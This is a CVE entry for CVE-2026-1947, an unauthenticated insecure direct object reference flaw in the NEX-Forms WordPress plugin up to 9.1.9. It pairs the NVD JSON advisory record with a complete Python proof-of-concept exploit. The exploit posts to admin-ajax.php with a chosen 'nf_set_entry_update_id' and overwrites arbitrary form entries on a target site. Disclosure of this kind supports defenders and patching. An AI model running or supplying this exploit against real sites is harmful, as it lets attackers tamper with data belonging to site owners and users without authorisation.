CVE-2026-1947

import requests import sys # CVE-2026-1947 PoC - NEX-Forms IDOR Vulnerability # Target: WordPress site with NEX-Forms plugin <= 9.1.9 def exploit_nex_forms_idor(target_url, form_id, entry_id_to_overwrite): """ Exploit IDOR vulnerability in NEX-Forms plugin Args: target_url: Base URL of the WordPress site form_id: ID of the form to submit to entry_id_to_overwrite: ID of the entry to overwrite (IDOR target) """ # Endpoint for form submission endpoint = f"{target_url}/wp-admin/admin-ajax.php" # Prepare the malicious payload # The nf_set_entry_update_id parameter is the key to IDOR exploitation data = { 'action': 'submit_nex_form', 'form_id': form_id, 'nf_set_entry_update_id': entry_id_to_overwrite, # IDOR: arbitrary entry ID 'nex_form_field_1': 'Malicious Data Overwritten', # Overwritten content 'nf_form_unique_id': 'exploit_' + str(entry_id_to_overwrite) } # Send the malicious request (no authentication required) headers = { 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64)', 'Content-Type': 'application/x-www-form-urlencoded', 'Referer': target_url } try: print(f"[*] Sending exploit request to {endpoint}") print(f"[*] Targeting form_id={form_id}, entry_id={entry_id_to_overwrite}") response = requests.post(endpoint, data=data, headers=headers, timeout=30) if response.status_code == 200: print(f"[+] Request sent successfully") print(f"[*] Response: {response.text[:500]}") return True else: print(f"[-] Request failed with status code: {response.status_code}") return False except requests.exceptions.RequestException as e: print(f"[-] Error: {e}") return False def main(): if len(sys.argv) < 4: print("Usage: python cve_2026_1947_poc.py <target_url> <form_id> <entry_id>") print("Example: python cve_2026_1947_poc.py http://example.com 1 999") sys.exit(1) target_url = sys.argv[1].rstrip('/') form_id = sys.argv[2] entry_id = sys.argv[3] print("=" * 60) print("CVE-2026-1947 - NEX-Forms IDOR Exploitation PoC") print("=" * 60) exploit_nex_forms_idor(target_url, form_id, entry_id) if __name__ == "__main__": main()

{"cve": {"id": "CVE-2026-1947", "sourceIdentifier": "[email protected]", "published": "2026-03-16T14:18:08.363", "lastModified": "2026-04-22T21:30:26.497", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The NEX-Forms – Ultimate Forms Plugin for WordPress plugin for WordPress is vulnerable to Insecure Direct Object Reference in all versions up to, and including, 9.1.9 via the submit_nex_form() function due to missing validation on a user controlled key. This makes it possible for unauthenticated attackers to to overwrite arbitrary form entries via the 'nf_set_entry_update_id' parameter."}, {"lang": "es", "value": "El plugin NEX-Forms – Ultimate Forms Plugin for WordPress, un plugin de WordPress, es vulnerable a Referencia Directa Insegura a Objeto en todas las versiones hasta la 9.1.9, inclusive, a través de la función submit_nex_form() debido a la falta de validación en una clave controlada por el usuario. Esto hace posible que atacantes no autenticados sobrescriban entradas de formulario arbitrarias a través del parámetro 'nf_set_entry_update_id'."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-639"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/changeset/3470888/nex-forms-express-wp-form-builder", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/b2a8c307-2430-4ea9-afe0-e5e758eabdd1?source=cve", "source": "[email protected]"}]}}